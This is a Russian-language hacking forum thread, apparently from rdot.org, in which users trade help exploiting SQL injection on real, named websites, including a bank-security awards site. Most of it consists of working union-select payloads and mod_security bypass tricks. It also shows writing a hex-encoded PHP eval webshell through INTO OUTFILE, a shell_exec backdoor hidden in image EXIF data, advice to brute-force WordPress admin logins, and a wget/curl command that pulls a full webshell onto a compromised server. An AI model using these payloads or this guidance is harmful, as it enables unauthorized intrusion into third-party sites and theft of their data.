Отлично выводит пользователя.

Code:
-1'+union+select+1,2,3,4,user,6,7,8,9,10+from+mysql .user+--+

Ответ - 404 Not Found
Тогда я подумал подставить валидное значение

Code:
-45742'+union+select+1,2,3,4,user,6,7,8,9,10+from+m ysql.user+--+

Ответ - 404 Not Found
Все дальнейшие запросы кроме user(), database(), version() отвечают ошибкой 404.
Тогда я подумал что это WAF. И загрязнил запрос стандартными комментариями.
Ответ - 404 Not Found
Вообще любые запросы отвечают 404.
Что это может быть?


Попробуй использовать подзапросы.

kingbeef said:
Попробуй использовать подзапросы.


Может быть, конечно, криво использовал select и подзапросы, но всё равно ответ был 404.


Code:
http://www.awards.ib-bank.ru/participant/-1'+union+select+1,2,3,4,5,6,7,8,9,10+--+

В общем вот инъекция сама. Тут вывод полей как видно.

Я первый раз сталкиваюсь с этим.

Конечно это может быть и WAF'ом, которому и комментарии нипочем (Всё-таки сайт посвящён ИБ банков).

Такой вопрос.. хотел посмотреть как работает сканер Jsky, ввел сайт, все норм.. вообщем он насканил file backup check, искал на форуме ну ничего не нашел((( хотел бы попросить ссылочку (если такова имеется) где было бы про эту уязвимость побольше информации и чтоб было написанно как её использовать..хотябы вкраце. Буду очень благодарен

Shade said:
Такой вопрос.. хотел посмотреть как работает сканер Jsky, ввел сайт, все норм.. вообщем он насканил
file backup check
, искал на форуме ну ничего не нашел((( хотел бы попросить ссылочку (если такова имеется) где было бы про эту уязвимость побольше информации и чтоб было написанно как её использовать..хотябы вкраце. Буду очень благодарен


Ничего примечательного. Возможно бэкап файла обыкновенный.

Мужики, такой вопрос.

Вроде бы обошел mod_security, в итоге такой запрос:

http://www.xxxxx.com/checkout.php?id=-39+/*!50000UNION*/+/*!50000SELECT*/+1,table_name,3,4,5,6,7,8,9,10,11+/*5000FROM*/+information_schema,tables+/*50000LIMIT*/+0,1--

Выдает ошибку "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0,1--' at line 1"

Что я неправильно сделал?

billybonse said:
Мужики, такой вопрос.
Вроде бы обошел mod_security, в итоге такой запрос:
http://www.xxxxx.com/checkout.php?id=-39+/*!50000UNION*/+/*!50000SELECT*/+1,table_name,3,4,5,6,7,8,9,10,11+/*5000FROM*/+information_schema,tables+/*50000LIMIT*/+0,1--
Выдает ошибку "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0,1--' at line 1"
Что я неправильно сделал?


http://www.xxxxx.com/checkout.php?id=-39+/*!50000UNION*/+/*!50000SELECT*/+1,table_name,3,4,5,6,7,8,9,10,11+/*5000FROM*/+information_schema,tables+/*50000LIMIT*/+0,1--

Запятая вместо точки.

такая же фигня, когда ставлю точку.

И еще вопрос (Простите нуба, только учусь, вопросов миллион)

Кручю скулю:

/shop.php?cid=34+union+select+1,2,3,4,5--

ошибка The used SELECT statements have a different number of columns

/shop.php?cid=34+union+select+1,2,3,4,5,6--

ошибка -

Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in /home/totalbha/public_html/shop/index.php on line 32

error in counting subcategory data :-The used SELECT statements have a different number of columns

При увеличении опять пишет, что неверное кол-во колонок. В чем ошибка и как ее обойти?

billybonse said:
И еще вопрос (Простите нуба, только учусь, вопросов миллион)
Кручю скулю:
/shop.php?cid=34+union+select+1,2,3,4,5--
ошибка The used SELECT statements have a different number of columns
/shop.php?cid=34+union+select+1,2,3,4,5,6--
ошибка -
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in /home/totalbha/public_html/shop/index.php on line 32
error in counting subcategory data :-The used SELECT statements have a different number of columns
При увеличении опять пишет, что неверное кол-во колонок. В чем ошибка и как ее обойти?



Попробуй перебрать через order+by

вообще безпонтово. ошибка

Error in fetching category data :-You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' union order by 20-- and status='yes' order by id DESC limit 0,8' at line 1

и по увеличению...

billybonse said:
вообще безпонтово. ошибка
Error in fetching category data :-You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' union order by 20-- and status='yes' order by id DESC limit 0,8' at line 1
и по увеличению...


А минус ставить не пробовал??

пробовал. та же хрень.

MaxFast said:
Может быть, конечно, криво использовал select и подзапросы, но всё равно ответ был 404.

Code:
http://www.awards.ib-bank.ru/participant/-1'+union+select+1,2,3,4,5,6,7,8,9,10+--+

В общем вот инъекция сама. Тут вывод полей как видно.
Я первый раз сталкиваюсь с этим.
Конечно это может быть и WAF'ом, которому и комментарии нипочем (Всё-таки сайт посвящён ИБ банков).


http://www.awards.ib-bank.ru/participant/-1'+union+select+1,2,3,4,5,6,7,table_name,9,10+from +information_schema%252etables+--+

Фильтруется точка


billybonse said:
вообще безпонтово. ошибка
Error in fetching category data :-You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' union order by 20-- and status='yes' order by id DESC limit 0,8' at line 1
и по увеличению...


Через error based крути

такая же фигня, когда ставлю точку.


Ошибка синтаксиса - это ошибка синтаксиса, проверяйте запрос.


billybonse said:
И еще вопрос (Простите нуба, только учусь, вопросов миллион)
Кручю скулю:
/shop.php?cid=34+union+select+1,2,3,4,5--
ошибка The used SELECT statements have a different number of columns
/shop.php?cid=34+union+select+1,2,3,4,5,6--
ошибка -
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in /home/totalbha/public_html/shop/index.php on line 32
error in counting subcategory data :-The used SELECT statements have a different number of columns
При увеличении опять пишет, что неверное кол-во колонок. В чем ошибка и как ее обойти?


В коде два или более запросов подряд с разным числом колонок. Вы подбираете к первому запросу нужное количество, но оно не подходит к следующим. Крутите другие векторы, к примеру уже упомянутый error-based.

Спасибо, попробую.

Привет. Нашел сайт может не я один наверное)) у него есть sql уязвимость через который доступна логин пасс админа. Но под админом не могу залить шелл подскажите как быть. вот оно http://www.planetsmag.com/index.php?issueid=63 .

Satd said:
Привет. Нашел сайт может не я один наверное)) у него есть sql уязвимость через который доступна логин пасс админа. Но под админом не могу залить шелл подскажите как быть. вот оно http://www.planetsmag.com/index.php?issueid=63 .


там ворд пресс есть, брутишь пасс и заливаешся

А можно разжевать для меня немного))

Satd said:
А можно разжевать для меня немного))


1. Вам нужна таблица wp_users.

2. Способы заливки. (https://rdot.org/forum/showpost.php?p=2097&postcount=5)

чем можно просканировать сайты на sql инъекции ?

знаю что можно проверять эти уязвимости и получать данные через havij, а как сайты проверять на наличие уязвимостей ? есть ли програмки ?

havij не может сканировать домены на наличие дырок sql ?

GAiN said:
чем можно просканировать сайты на sql инъекции ?
знаю что можно проверять эти уязвимости и получать данные через havij, а как сайты проверять на наличие уязвимостей ? есть ли програмки ?
havij не может сканировать домены на наличие дырок sql ?


Различного уровня сканеров полно в интернете.

Белов делал небольшую подборку на хабре: http://habrahabr.ru/post/125317/

Нужна помощь.

Нашёл sql, пытаюсь залить шелл, проверяю file_priv и выскакивает ошибка. Не могу разобраться, что делаю не так.


Code:
id=-31+union+select+1,2,3,4,file_priv,6,7,8,9,10,11,12 ,13+from+mysql.user--

Ошибка такая:


Code:
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1' at line 1

Wcfs, ты перевести текст неможешь? у тебя синактичесткая ошибка при запросе, скорее всего ковычки фильтруются

Привет!

Делаю запрос


site.ru/index.php?id=-14+union+select+file_priv,2+from+mysql.user+where+ user='root'


На что выдает Y Unknown column 'id' in 'where clause'

Далее пытаюсь залить шелл


site.ru/index.php?id=-14+union+select+'',2+from+mysql.user+into+outfile+ '/tmp/s.php'


На что выдает You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and id<>-14 union select '',2 from mysql.user in' at line 1

Как правильно составить запрос, чтобы не выскакивала ошибка?

Evil_Genius said:
Далее пытаюсь залить шелл
На что выдает
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and id<>-14 union select '',2 from mysql.user in' at line 1
Как правильно составить запрос, чтобы не выскакивала ошибка?


сам шелл нужно хексить


site.ru/index.php?id=-14+union+select+0x3c3f706870206576616c28245f524551 554553545b636d645d293b203f3e,2+from+mysql.user+int o+outfile+'/tmp/s.php'

Подскажите, где в паблике найти уязвимости/эксплоиты старых версий galleryproject.org (интересуют версии 2.2 и 2.1)

winstrool said:
сам шелл нужно хексить



Захексил, выполнил запрос и вот что выдает:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and id<>-14 union select 0x3c3f706870206576616c28245f524551554553545b636d64 5d29' at line 1

Такое ощущение что какоето ограничение на кол-во символов в запросе

Evil_Genius said:
Захексил, выполнил запрос и вот что выдает:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and id<>-14 union select 0x3c3f706870206576616c28245f524551554553545b636d64 5d29' at line 1
Такое ощущение что какоето ограничение на кол-во символов в запросе


Такое ощущение, что нужно угадывать, что именно вы там делаете, давайте урл посмотрим, иначе курите мануалы!

Evil_Genius said:
Привет!
Делаю запрос
site.ru/index.php?id=-14+union+select+file_priv,2+from+mysql.user+where+ user='root'
На что выдает
Y Unknown column 'id' in 'where clause'
Далее пытаюсь залить шелл
На что выдает
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and id<>-14 union select '',2 from mysql.user in' at line 1
Как правильно составить запрос, чтобы не выскакивала ошибка?




Захексил, выполнил запрос и вот что выдает:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and id<>-14 union select 0x3c3f706870206576616c28245f524551554553545b636d64 5d29' at line 1


Такое ощущение, что вы копируете сюда не те запросы, которые выполняете.

По первому:

1) У рута file_priv есть по умолчанию.

2) Колонки id в mysql.user нет.

3) Если запрос таки правильный, вставьте комментарий в конец.

По второму:

1) Действительно, копируйте запрос.

2) Если ограничение на длину, проверьте простым вписыванием длинной строки в хексе.

3) Ошибка синтаксиса - это все еще ошибка синтаксиса. Начните с запроса, который выполняется корректно, а потом доводите до шелла.

Привет

вопрос по MSSQL2000 with error:

....../xyz.asp?param=99%27


Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '99'' to a column of data type int.

Но

....../xyz.asp?param=99%20AND%201=1

возвращает


Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '99 and 1=1' to a column of data type int.

можно что-то сделать? или тут не сможем повлиять на исполнение запроса?

на некоторых сайтах когда проверяешь на sql инъекцию то идёт редирект, как это реализуется на php ?

GAiN said:
на некоторых сайтах когда проверяешь на sql инъекцию то идёт редирект, как это реализуется на php ?




PHP:
if(!is_numeric($_GET['id'])) {

header('Location: /');

exit;

}

есть скуля.

1.подбирал кол-во полей - 18


Code:
site.com/index.php?id=15+order+by+18+--+

2.Пытаюсь узнать принтабельное поле


Code:
site.com/index.php?id=15+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18+--+

3. срабатывает mod security. "select" загоняю в char


Code:
site.com/index.php?id=15+union+CHAR(115, 101, 108, 101, 99, 116)+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+

возращает такую ошибку:


Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /***/****public_html/xjax/xjax.php on line 227
No Products Found


что с этим делать?

erwap said:
что с этим делать?


гуглить "mod_security bypass"

долго я искал возможность через админку залить шелл wso2.php, но никак не получалось, всеми правдами и не правдами к полвторому ночи у меня получилось следующее: имеется файл вида site.com/shell.jpg.php5?r0ng=ls , где shell.jpg - это белый квадрат с поредактированными данными EXIF , где живёт код


PHP:
".shell_exec($_GET["r0ng"]);}?>

..

Вопрос в том, как залить полноценный шелл имя вот эти входные данные, подскажите, пожалуйста

FieryDragon said:
долго я искал возможность через админку залить шелл wso2.php, но никак не получалось, всеми правдами и не правдами к полвторому ночи у меня получилось следующее: имеется файл вида site.com/shell.jpg.php5?r0ng=ls , где shell.jpg - это белый квадрат с поредактированными данными EXIF , где живёт код

PHP:
".shell_exec($_GET["r0ng"]);}?>

..
Вопрос в том, как залить полноценный шелл имя вот эти входные данные, подскажите, пожалуйста


Вы таки не поверите, но wget -O s.php http://site/shell.ext. Или curl. Или что угодно подобное.